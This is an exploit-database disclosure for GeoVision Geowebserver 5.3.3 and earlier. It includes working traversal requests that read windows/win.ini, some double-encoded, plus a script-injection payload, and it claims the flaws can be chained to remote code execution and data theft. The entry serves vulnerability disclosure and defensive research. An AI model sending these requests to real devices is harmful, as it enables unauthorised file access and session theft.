GeoVision Geowebserver 5.3.3 – Local FIle Inclusion

• Exploit Database
• 32 阅读

• 作者： Ken Pyle
  日期： 2021-08-17
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50211/

• # Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
  # DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
  # Date: 6-16-21 (Vendor Notified)
  # Exploit Author: Ken 's1ngular1ty' Pyle
  # Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
  # Version: <= 5.3.3
  # Tested on: Windows 20XX / MULTIPLE
  # CVE : https://www.geovision.com.tw/cyber_security.php
  
  GEOVISION GEOWEBSERVER =< 5.3.3 are vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client side exploitation, including session theft:
  
  Nested Exploitation of the LFI, XSS, HTML / Browser Injection:
  
  GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1
  
  Absolute exploitation of the LFI:
  
  POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
  
  GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini
  
  Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.
  
  
  ex. obj_name=INJECTEDHTML / XSS
  
  The application fails to properly enforce permissions and sanitize user request. This allows for LFI / Remote Code Execution through several vectors:
  
  ex. /Visitor//%252e(path to target)
  
  These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:
  
  The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.
  
  These attacks were disclosed as part of the IOTVillage Presentation: